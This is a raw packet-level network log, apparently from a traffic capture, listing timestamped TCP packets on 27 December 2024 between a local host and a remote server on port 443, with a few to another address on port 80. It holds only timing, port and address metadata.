                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:53.675082922 CET8049730152.199.19.74192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:53.675143003 CET4973080192.168.2.4152.199.19.74
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.403837919 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.403928041 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.404042006 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.404812098 CET49766443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.404829025 CET44349766188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.545733929 CET44349767188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.546231985 CET49767443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.546693087 CET49767443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.546704054 CET44349767188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.548247099 CET49767443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.548258066 CET44349767188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.548373938 CET49767443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.548394918 CET44349767188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.550218105 CET49767443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.550240993 CET44349767188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.554177046 CET49767443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:54.554199934 CET44349767188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:55.026784897 CET49768443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:55.026840925 CET44349768188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:55.026927948 CET49768443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:55.027184963 CET49768443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:55.027203083 CET44349768188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.249073982 CET44349767188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.249145985 CET44349767188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.249159098 CET49767443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.249197960 CET49767443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.249913931 CET49767443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.249921083 CET44349767188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.475523949 CET44349768188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.475594044 CET49768443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.476128101 CET49768443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.476136923 CET44349768188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.478033066 CET49768443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.478039026 CET44349768188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.478112936 CET49768443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.478136063 CET44349768188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.478142023 CET49768443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:56.478158951 CET44349768188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:03.214698076 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:03.214709044 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:03.334347963 CET44349772188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:03.334414959 CET44349772188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:03.334439993 CET49772443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:03.334470034 CET49772443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:03.335231066 CET49772443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:03.335248947 CET44349772188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.242240906 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.242292881 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.242376089 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.242647886 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.242665052 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.747945070 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.748028994 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.754405975 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.754435062 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.770749092 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.770768881 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.770854950 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.770879030 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.770893097 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.770905972 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.770972967 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.771008968 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.771024942 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.771039009 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.771107912 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.771131039 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.771229982 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.774810076 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.774825096 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.774857998 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.774871111 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.774926901 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.774940014 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.774966002 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.774988890 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.775012016 CET49782443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:04.775022030 CET44349782188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.124639988 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.126370907 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.126754999 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.126760006 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.128416061 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.128421068 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.128508091 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.128525972 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.128530979 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.128535986 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.128607035 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.128628969 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.128635883 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.128642082 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.128745079 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.128767014 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.128803968 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130132914 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130147934 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130167007 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130181074 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130187035 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130194902 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130269051 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130278111 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130292892 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130311966 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130312920 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130326986 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130362988 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130376101 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130434036 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130441904 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130479097 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130490065 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130511045 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130525112 CET44349783188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130542040 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130595922 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130630016 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130645990 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130665064 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130681038 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130696058 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:06.130749941 CET49783443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313433886 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313450098 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313461065 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313474894 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313481092 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313534975 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313541889 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313560963 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313574076 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313580036 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313584089 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313599110 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313610077 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313616037 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313618898 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313642025 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313652992 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313694000 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313700914 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313723087 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313735008 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313750029 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313755035 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313807011 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313812971 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313824892 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313836098 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313848019 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313853025 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313862085 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313869953 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313915014 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313930035 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.313973904 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.314018011 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.314057112 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.314096928 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.314142942 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.314160109 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.314215899 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.355339050 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.355515957 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.355571032 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.355608940 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.355650902 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.355696917 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.355740070 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.355747938 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.355760098 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.355803967 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.355861902 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.399379969 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.399755955 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.399785995 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.399791956 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.399822950 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.399831057 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.399842024 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.399879932 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.399919033 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.399936914 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.399981976 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.400024891 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.443334103 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.443485975 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.443502903 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.443547964 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.443564892 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.443607092 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.443624020 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.443645954 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.443656921 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.443698883 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.443706989 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.443727016 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.491333008 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.491585970 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.491605043 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.491620064 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.491630077 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.491645098 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.491652966 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.491667986 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.491682053 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:11.491691113 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.049010038 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.049037933 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.049060106 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.049211979 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.049237967 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.050367117 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.050424099 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.050537109 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.050564051 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.050573111 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.050580978 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.050708055 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.050741911 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.051836014 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.051973104 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.051979065 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.052022934 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.052067995 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.052134037 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.075418949 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.075436115 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.075568914 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.075593948 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.075834036 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.075848103 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.075870037 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.075881004 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.075896025 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.075913906 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.075941086 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.119328976 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.193681002 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.193950891 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.193952084 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.193990946 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194073915 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194113016 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194130898 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194263935 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194272041 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194318056 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194343090 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194355965 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194370985 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194380045 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194394112 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194415092 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194432020 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194474936 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194494009 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194515944 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194544077 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194564104 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194577932 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194608927 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194619894 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194638014 CET49796443192.168.2.4188.245.216.205
